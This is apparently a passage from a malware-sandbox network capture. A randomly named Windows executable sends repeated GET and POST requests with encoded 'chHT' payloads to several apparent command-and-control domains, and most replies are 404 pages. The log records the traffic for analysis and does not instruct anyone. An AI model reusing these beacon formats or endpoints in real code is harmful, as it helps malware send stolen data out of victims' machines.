                      Sep 10, 2024 08:48:36.390650034 CEST465OUTGET /xcfw/?chHT=bjW1F6zberoR1D3Y/XEIKVRbrrv+ro5pHttayncOl0oweWLXznwX2+g7zIG3cvz9HU+qZyWIdkFY93Q5IGFAwVPxBpt2RsyemRiOMSAY7rdemSMqYxcM/3o=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.freepicture.online
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:48:37.031356096 CEST360INHTTP/1.1 404 Not Found
                      Date: Tue, 10 Sep 2024 06:48:36 GMT
                      Server: Apache
                      Content-Length: 196
                      Connection: close
                      Content-Type: text/html; charset=iso-8859-1
                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      5192.168.2.449742154.23.184.240801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:48:50.513559103 CEST713OUTPOST /p39s/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Referer: http://www.hm62t.top/p39s/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 63 6f 68 45 76 31 4f 2f 71 41 6a 66 4d 41 59 76 34 57 39 52 38 6c 53 70 4a 62 74 48 72 59 61 35 76 64 67 46 76 32 64 48 49 5a 33 4f 77 33 54 4c 45 2f 54 41 41 76 70 50 4c 2f 47 49 41 38 34 30 4f 36 76 71 38 73 30 73 62 4e 44 34 6a 7a 33 48 51 43 65 66 61 54 32 6a 32 33 67 5a 67 66 79 79 50 7a 63 59 56 6c 48 48 4b 69 47 76 52 62 39 4b 6f 5a 61 56 4c 45 4f 4a 43 4f 64 4c 32 76 2b 35 49 56 61 39 69 50 52 55 72 54 74 76 5a 7a 72 56 61 35 52 4d 2b 4c 6c 54 66 71 72 78 70 2f 63 52 65 37 77 59 50 61 54 6c 6c 79 31 5a 58 33 6c 30 6e 33 68 63 41 3d 3d
                      Data Ascii: chHT=4PVtP2BQg8qzhcohEv1O/qAjfMAYv4W9R8lSpJbtHrYa5vdgFv2dHIZ3Ow3TLE/TAAvpPL/GIA840O6vq8s0sbND4jz3HQCefaT2j23gZgfyyPzcYVlHHKiGvRb9KoZaVLEOJCOdL2v+5IVa9iPRUrTtvZzrVa5RM+LlTfqrxp/cRe7wYPaTlly1ZX3l0n3hcA==
                      Sep 10, 2024 08:48:51.390253067 CEST312INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:51 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      6192.168.2.449743154.23.184.240801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:48:53.119609118 CEST733OUTPOST /p39s/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Referer: http://www.hm62t.top/p39s/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 65 41 61 35 4e 56 67 45 74 65 64 47 49 5a 33 46 51 33 53 47 6b 2f 45 41 41 69 55 50 4b 54 47 49 41 6f 34 30 50 4b 76 72 50 45 31 74 4c 4e 42 30 44 7a 31 4a 77 43 65 66 61 54 32 6a 32 53 46 5a 67 58 79 79 66 6a 63 65 78 78 47 45 4b 69 48 6d 78 62 39 64 34 5a 57 56 4c 45 6f 4a 42 4b 6e 4c 31 58 2b 35 4e 35 61 7a 54 50 53 64 72 54 72 78 70 79 58 57 61 73 4f 41 2b 2b 62 65 70 43 51 38 61 54 62 51 59 71 71 4a 2b 37 45 33 6c 57 47 45 51 2b 52 35 6b 4b 6f 48 4c 5a 64 74 75 2b 68 46 49 63 70 43 57 7a 64 4b 36 73 76 6e 75 67 3d
                      Data Ascii: chHT=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHeAa5NVgEtedGIZ3FQ3SGk/EAAiUPKTGIAo40PKvrPE1tLNB0Dz1JwCefaT2j2SFZgXyyfjcexxGEKiHmxb9d4ZWVLEoJBKnL1X+5N5azTPSdrTrxpyXWasOA++bepCQ8aTbQYqqJ+7E3lWGEQ+R5kKoHLZdtu+hFIcpCWzdK6svnug=
                      Sep 10, 2024 08:48:54.016617060 CEST312INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:53 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      7192.168.2.449744154.23.184.240801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:48:55.660487890 CEST10815OUTPOST /p39s/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.hm62t.top
                      Origin: http://www.hm62t.top
                      Referer: http://www.hm62t.top/p39s/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 34 50 56 74 50 32 42 51 67 38 71 7a 68 38 34 68 44 4e 64 4f 33 71 41 6b 61 4d 41 59 6d 59 57 35 52 37 74 53 70 49 50 44 48 64 67 61 35 2b 4e 67 47 4d 65 64 55 59 5a 33 47 51 33 50 47 6b 2f 5a 41 44 54 54 50 4b 50 57 49 43 51 34 33 74 79 76 69 61 77 31 6b 4c 4e 42 70 54 7a 34 48 51 43 4c 66 61 69 2b 6a 32 69 46 5a 67 58 79 79 61 6e 63 64 6c 6c 47 49 71 69 47 76 52 61 38 4b 6f 59 2f 56 4c 64 54 4a 41 2f 59 49 46 33 2b 36 74 70 61 78 6c 62 53 53 72 54 70 77 70 79 50 57 61 77 72 41 2b 6a 71 65 74 4b 36 38 5a 50 62 54 73 7a 4c 54 50 2b 62 74 57 53 44 57 6a 53 57 34 69 66 72 4a 70 78 53 73 4f 47 62 66 72 34 30 4d 31 43 48 64 5a 6b 4e 6b 35 69 76 67 44 69 66 4e 47 59 5a 50 54 6f 32 63 79 33 77 31 35 61 49 70 78 33 67 4c 5a 79 47 63 39 4e 57 4b 44 66 78 64 49 6c 71 50 53 68 46 6d 6d 53 6d 76 31 6e 4a 54 33 73 54 68 2b 50 30 52 4e 53 43 67 30 59 31 38 43 61 4a 33 55 37 6d 35 32 47 58 57 49 58 31 48 37 65 71 6d 37 35 77 30 48 32 67 75 56 79 39 73 6c 2f 34 6d 61 39 69 4c 7a 64 6d 4d 77 50 4b 44 [TRUNCATED]
                      Data Ascii: chHT=4PVtP2BQg8qzh84hDNdO3qAkaMAYmYW5R7tSpIPDHdga5+NgGMedUYZ3GQ3PGk/ZADTTPKPWICQ43tyviaw1kLNBpTz4HQCLfai+j2iFZgXyyancdllGIqiGvRa8KoY/VLdTJA/YIF3+6tpaxlbSSrTpwpyPWawrA+jqetK68ZPbTszLTP+btWSDWjSW4ifrJpxSsOGbfr40M1CHdZkNk5ivgDifNGYZPTo2cy3w15aIpx3gLZyGc9NWKDfxdIlqPShFmmSmv1nJT3sTh+P0RNSCg0Y18CaJ3U7m52GXWIX1H7eqm75w0H2guVy9sl/4ma9iLzdmMwPKDqGpUmv07rnogNbzLOPuBRZTCBHTk5L5LTmaP3dXPoeNL6UOCy8z0+qmVqoBTMBJRuIiUgDpkJq2tb8o5hUC4gqJcjieRxZj0Po468HyMnCvpVXSGZEEsvN//sDnG4hAo++82Ml20F4B8XdPI2TeuEOONeWnl4QkGYw4qg21BvRcGfzUq/nPjAVcnE+wDDKoG2dudaeQ9UIdJMOf/uhsVpJqXLqaEpXTmvBoCzIF5IkOr3ZohgUpHDf22w6j9u+oOLYj651SuyFrbkT2+SSaeZzzUxnNpTyh6VVgvlUqriUgoZ2G/dhiXPNm2mFikZIQNnjgu0EnpI9mM6GWDkiTYKVT7WWsPqfkPvW1s34PO3aY0eg7lIpebPn7XPB8BvoH3h1Lm7N44BHwQ1xo+CiudZ3jnRf4ZeSazfkRoCJmN5rcSaquSZvPg3geTlVsI5egG6N59IZwjYcH0/fGMlzW3m9OVZbCR5rrNxbdL0Er0cXWxTa3kuYnHNpFonDW/fzus0kB9OEaGP2NpAtsEXewlt8zFuPfRDROeKNHh5FIR9O7eoKTi/yFxsE9ag6SvvGJ+JqKGuVXutgNVD7uvXLn7hRxN3hgFqT0/2YdPARyvFOvvjOTduP96QeTNG3ynh3yTxDJaCcZ/yfW5C/dCzwIsJnoZwDDiYa4Lyz [TRUNCATED]
                      Sep 10, 2024 08:48:56.845432043 CEST312INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:56 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Sep 10, 2024 08:48:56.845750093 CEST312INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:56 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      8192.168.2.449745154.23.184.240801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:48:58.201013088 CEST456OUTGET /p39s/?chHT=1N9NMDNpm9Czos0vDuAaxfkyacdu5dmrSL4zw6nNIeZI+vV5F9OeQvh5MDj1LHrQPj2dGZTcA38l142ujvV81dYi+UjaGlO+WfnitkWEaBCkm6SMdBoGO9M=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.hm62t.top
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:48:59.098756075 CEST312INHTTP/1.1 404 Not Found
                      Server: nginx
                      Date: Tue, 10 Sep 2024 06:48:58 GMT
                      Content-Type: text/html
                      Content-Length: 148
                      Connection: close
                      ETag: "66a8e223-94"
                      Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      9192.168.2.44974685.159.66.93801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:04.313524961 CEST746OUTPOST /k2vl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.golbasi-nakliyat.xyz
                      Origin: http://www.golbasi-nakliyat.xyz
                      Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 42 65 6c 6f 46 53 4d 61 56 2f 47 6e 32 48 4a 2b 75 6c 45 70 41 52 39 4e 61 78 32 4f 66 43 47 58 4f 6e 62 6d 6a 66 42 70 36 6e 37 6d 34 6a 79 79 4d 70 66 56 2f 63 71 37 48 76 2b 61 44 59 47 54 63 70 54 56 57 61 39 74 64 49 51 5a 59 76 46 63 30 79 55 69 33 4b 65 68 52 71 55 2f 34 7a 51 6e 55 43 35 76 4e 56 55 54 56 67 37 75 41 37 4d 33 45 54 56 56 43 74 42 6a 50 69 72 75 70 38 53 56 4c 6a 58 42 48 78 51 59 78 38 68 44 48 74 62 64 58 2b 35 5a 37 69 57 43 62 53 45 51 69 42 59 73 66 77 4b 5a 59 6b 58 43 64 78 6d 43 4c 31 48 58 35 74 6d 30 6f 67 3d 3d
                      Data Ascii: chHT=ezGJx9beP/VwBeloFSMaV/Gn2HJ+ulEpAR9Nax2OfCGXOnbmjfBp6n7m4jyyMpfV/cq7Hv+aDYGTcpTVWa9tdIQZYvFc0yUi3KehRqU/4zQnUC5vNVUTVg7uA7M3ETVVCtBjPirup8SVLjXBHxQYx8hDHtbdX+5Z7iWCbSEQiBYsfwKZYkXCdxmCL1HX5tm0og==


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.44974785.159.66.93801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:06.964118004 CEST766OUTPOST /k2vl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.golbasi-nakliyat.xyz
                      Origin: http://www.golbasi-nakliyat.xyz
                      Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 221
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 69 58 4e 46 44 6d 69 65 42 70 35 6e 37 6d 71 44 79 33 52 35 66 65 2f 63 32 7a 48 76 79 61 44 59 53 54 63 6f 50 56 57 70 6c 71 64 59 51 62 51 50 46 4e 77 79 55 69 33 4b 65 68 52 71 51 47 34 7a 59 6e 55 7a 4a 76 50 33 77 55 4c 51 37 78 4a 62 4d 33 4f 7a 56 52 43 74 41 32 50 6d 72 55 70 36 57 56 4c 69 6e 42 48 67 51 62 2b 38 68 46 61 39 61 35 61 63 30 48 2b 77 33 34 52 78 49 7a 6c 78 63 75 58 57 62 44 4a 56 32 56 50 78 43 78 57 79 4f 6a 30 75 62 39 7a 67 4c 5a 5a 33 30 61 34 4e 72 77 4d 58 2f 46 42 4a 55 2b 33 46 6f 3d
                      Data Ascii: chHT=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxiXNFDmieBp5n7mqDy3R5fe/c2zHvyaDYSTcoPVWplqdYQbQPFNwyUi3KehRqQG4zYnUzJvP3wULQ7xJbM3OzVRCtA2PmrUp6WVLinBHgQb+8hFa9a5ac0H+w34RxIzlxcuXWbDJV2VPxCxWyOj0ub9zgLZZ30a4NrwMX/FBJU+3Fo=


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.44974885.159.66.93801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:09.505068064 CEST10848OUTPOST /k2vl/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.golbasi-nakliyat.xyz
                      Origin: http://www.golbasi-nakliyat.xyz
                      Referer: http://www.golbasi-nakliyat.xyz/k2vl/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 10301
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Data Raw: 63 68 48 54 3d 65 7a 47 4a 78 39 62 65 50 2f 56 77 41 2b 56 6f 48 31 59 61 41 76 47 67 36 6e 4a 2b 6b 46 45 74 41 57 31 4e 61 31 75 65 66 78 71 58 4e 77 58 6d 69 39 35 70 34 6e 37 6d 78 44 79 32 52 35 66 44 2f 63 75 33 48 76 4f 77 44 62 71 54 4f 61 72 56 42 4d 52 71 53 59 51 62 53 50 46 64 30 79 55 53 33 4b 4f 74 52 71 41 47 34 7a 59 6e 55 77 52 76 49 6c 55 55 4a 51 37 75 41 37 4d 42 45 54 56 31 43 74 6f 6d 50 6d 76 45 6f 4b 32 56 4c 43 33 42 55 69 34 62 7a 38 68 48 5a 39 61 68 61 63 34 6d 2b 77 62 46 52 79 55 4a 6c 7a 41 75 55 51 61 2b 56 68 2b 66 61 43 43 5a 41 77 76 44 39 50 50 37 33 48 66 39 66 6b 6b 79 6c 39 37 65 58 6c 6d 76 61 73 49 6d 6f 69 6a 53 68 54 56 61 57 2b 37 30 67 36 5a 61 44 56 66 6c 65 6f 43 6f 6b 2f 34 54 4f 51 73 6a 64 4e 34 43 6e 68 46 32 49 39 55 77 6a 2b 57 54 6b 31 47 43 61 4f 6a 47 73 55 6c 74 44 59 2b 54 54 57 43 2b 69 55 38 68 50 38 39 39 76 43 77 4b 51 7a 53 61 67 51 6c 76 75 49 4d 41 6b 46 6b 38 33 61 47 37 2f 2f 4b 4b 68 50 47 75 49 39 59 71 69 56 4a 2b 77 52 35 41 33 [TRUNCATED]
                      Data Ascii: chHT=ezGJx9beP/VwA+VoH1YaAvGg6nJ+kFEtAW1Na1uefxqXNwXmi95p4n7mxDy2R5fD/cu3HvOwDbqTOarVBMRqSYQbSPFd0yUS3KOtRqAG4zYnUwRvIlUUJQ7uA7MBETV1CtomPmvEoK2VLC3BUi4bz8hHZ9ahac4m+wbFRyUJlzAuUQa+Vh+faCCZAwvD9PP73Hf9fkkyl97eXlmvasImoijShTVaW+70g6ZaDVfleoCok/4TOQsjdN4CnhF2I9Uwj+WTk1GCaOjGsUltDY+TTWC+iU8hP899vCwKQzSagQlvuIMAkFk83aG7//KKhPGuI9YqiVJ+wR5A3JwgAwY8olLITXqqhXvSE8/hqHB6FeP5KojKVQKvOdZxBkbVKPv8+bQJ86WkJX03hXxWlSQR3f8NyevsZ1/lZONlLGk4cA4y75KY6KZKeMskkxmbwEqGHmCcZQTttn1VzWFqwMnmm57d+8O7W/2YUXZC+ESaMRYVvaOVjUbt5Bn2tA1Di8AfN0Ev/X8Yp7MfoMV1BGDSkkFOmiJRba5h2X+VS3NnsLRRomtN4+dekdRuRguMGvEJJ5EsGCigYbtNwnr6X7Q/iUZOH1CzQlX5w6UiQ23Wi40onxD9Z9Q39/p6qTVlHMkSXSLJurphgUxLgR+XDYe0rfeJwV+o9s5e36DcGuZrt7hGVmIqksJU4F8H/Fyfvkdrq9HRBNOEHMNKcAV07gUudxYNDh/Hgpb0UCqApVMLKKbjTMzrW7QZ4USFO4lLYNP4gi+Y9opG1ku6b3If3lULfcn2AM/UD9iu0vl9T9YYmlbQpgTwxWJmHv23dnOZPtYlFsV/hFcBlgUPglSmhae5ERs48UNIu8vCBIfKb2p6Vexs7ZNwXnWuGXNdXTRXKgDAcKX34mJnTfeQ1bp+ITsLMJQGzk9n5GGbxihNYqPcRRA3/ZxIHBONIxzwBp4WTr8+BbCeNPpMTr9GQ+8JLNMJV42LcZrg3YVcN3IbavRbgoF0afS [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.44974985.159.66.93801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:12.050884008 CEST467OUTGET /k2vl/?chHT=TxupyKnRMohPPcJUOXYiFfym6FYb3U4dGmgAGE+PRAnDIVDTmPtyynXiyBeLb9PD0fLjVO+SDceqOMvNcp9bNPEHR5AP8gY607qfZYhRyRQHcihpFxABXgI=&bd=rj1X_pBPLTnXd0 HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Language: en-US,en
                      Host: www.golbasi-nakliyat.xyz
                      Connection: close
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                      Sep 10, 2024 08:49:12.745553970 CEST225INHTTP/1.1 404 Not Found
                      Server: nginx/1.14.1
                      Date: Tue, 10 Sep 2024 06:49:12 GMT
                      Content-Length: 0
                      Connection: close
                      X-Rate-Limit-Limit: 5s
                      X-Rate-Limit-Remaining: 19
                      X-Rate-Limit-Reset: 2024-09-10T06:49:17.6317063Z


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.449750185.173.111.76801880C:\Program Files (x86)\olqjFuVmpJmOTDxYMIfsboOxsldOPJmJCCmlgJGsOCeDlwKx\ZQphKCYQofBW.exe
                      TimestampBytes transferredDirectionData
                      Sep 10, 2024 08:49:18.214747906 CEST740OUTPOST /lwt6/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                      Accept-Encoding: gzip, deflate, br
                      Accept-Language: en-US,en
                      Host: www.mfgamecompany.shop
                      Origin: http://www.mfgamecompany.shop
                      Referer: http://www.mfgamecompany.shop/lwt6/
                      Content-Type: application/x-www-form-urlencoded
                      Connection: close
                      Content-Length: 201
                      Cache-Control: max-age=0
                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6725 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
